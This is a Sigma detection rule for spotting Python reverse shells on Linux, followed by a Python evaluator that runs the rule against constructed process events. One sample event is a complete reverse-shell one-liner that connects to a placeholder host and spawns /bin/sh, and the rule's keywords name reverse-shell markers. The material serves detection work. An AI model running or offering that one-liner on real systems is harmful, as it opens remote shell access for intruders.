Potential Python Reverse Shell
Detects python being executed with command-line keywords related to network activity that could indicate a reverse shell.
Sigma rule

```yaml
title: Potential Python Reverse Shell
id: 32e62bc7-3de0-4bb1-90af-532978fe42c0
related:
    - id: c4042d54-110d-45dd-a0e1-05c47822c937
      type: similar
status: test
description: Detects executing python with keywords related to network activity that could indicate a potential reverse shell
references:
    - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
    - https://www.revshells.com/
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-24
tags:
    - attack.execution
logsource:
    category: process_creation
    product: linux
detection:
    selection:
        Image|contains: 'python'
        CommandLine|contains|all:
            - ' -c '
            - 'import'
            - 'pty'
            - 'spawn('
            - '.connect'
    condition: selection
falsepositives:
    - Unknown
level: high
```
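As an added example (not the rule's own code nor part of the Sigma project), the following evaluates this rule's selection over constructed Linux process_creation events, showing which command lines trigger it and that Sigma's `contains` matching is case-insensitive by default. Field names follow the rule (`Image`, `CommandLine`); host and port in the sample are placeholders.

```python
"""Minimal evaluator for the 'Potential Python Reverse Shell' selection.
Added example: not Sigma's own matching engine; sample events are constructed."""

# Selection values copied from the rule above.
IMAGE_CONTAINS = "python"
COMMANDLINE_CONTAINS_ALL = [" -c ", "import", "pty", "spawn(", ".connect"]


def matches_rule(event: dict) -> bool:
    """Return True when the event satisfies the rule's selection.

    Sigma string modifiers (contains, contains|all) are case-insensitive by
    default, so both the field values and the keywords are lower-cased.
    """
    image = str(event.get("Image", "")).lower()
    cmdline = str(event.get("CommandLine", "")).lower()
    if IMAGE_CONTAINS not in image:
        return False
    # contains|all: every listed substring must appear in CommandLine.
    return all(token.lower() in cmdline for token in COMMANDLINE_CONTAINS_ALL)


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {  # inline -c payload carrying all five keywords; placeholders for host/port
        "Image": "/usr/bin/python3",
        "CommandLine": "python3 -c \"import pty,socket;s=socket.socket();"
                       "s.connect(('<C2_HOST>',<PORT>));pty.spawn('/bin/sh')\"",
    },
    {  # benign: network client code, but no pty/spawn( keywords
        "Image": "/usr/bin/python3",
        "CommandLine": "python3 -c \"import socket;s=socket.socket();s.connect(('db.internal',5432))\"",
    },
    {  # python run on a script file, no inline ' -c ' payload
        "Image": "/usr/bin/python3.11",
        "CommandLine": "python3.11 /opt/app/serve.py --port 8080",
    },
    {  # not a python image at all
        "Image": "/usr/bin/perl",
        "CommandLine": "perl -e 'use Socket;'",
    },
]


def alerts(events) -> list:
    """Indices of the events that would raise this rule (level: high)."""
    return [i for i, e in enumerate(events) if matches_rule(e)]


if __name__ == "__main__":
    for i in alerts(SAMPLE_EVENTS):
        print(f"ALERT event[{i}]: {SAMPLE_EVENTS[i]['CommandLine']}")
```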